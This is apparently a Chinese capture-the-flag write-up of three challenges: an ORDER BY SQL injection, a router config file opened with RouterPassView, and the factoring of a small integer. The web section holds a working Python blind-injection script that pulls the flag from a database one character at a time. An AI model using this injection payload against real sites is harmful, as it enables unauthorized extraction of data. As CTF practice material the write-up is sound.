WEB
简单order注入
- 提示是order注入,网上查了资料,学习了一波,源码里提示: select flag from flag,省去爆表名列名了,直接爆数据
- 盲注脚本:
1
2
3
4
5
6
7
8
9
10
11
12import requests
flag = ''
url = 'http://101.71.29.5:10001/?order=(select+1+regexp+if(ord(substring((select+flag+from+flag+limit+0,1),{},1))={},1,0x00))%23&button=submit'
for i in range(24,28):
for j in range(32,127):
u = url.format(i,j)
#print(u)
if ('fangzhang' not in requests.get(u).text):
flag += chr(j)
print(flag)
break
print(flag)签到题不会,呜呜呜
MISC
下载RouterPassView打开bin文件就能看到flag
CRYPTO
- Description: 密码学历史中,有两位知名的杰出人物,Alice和Bob。他们的爱情经过置换和轮加密也难以混淆,即使是没有身份认证也可以知根知底。就像在数学王国中的素数一样,孤傲又热情。下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。
- 分解大数网站: http://www.factordb.com/index.php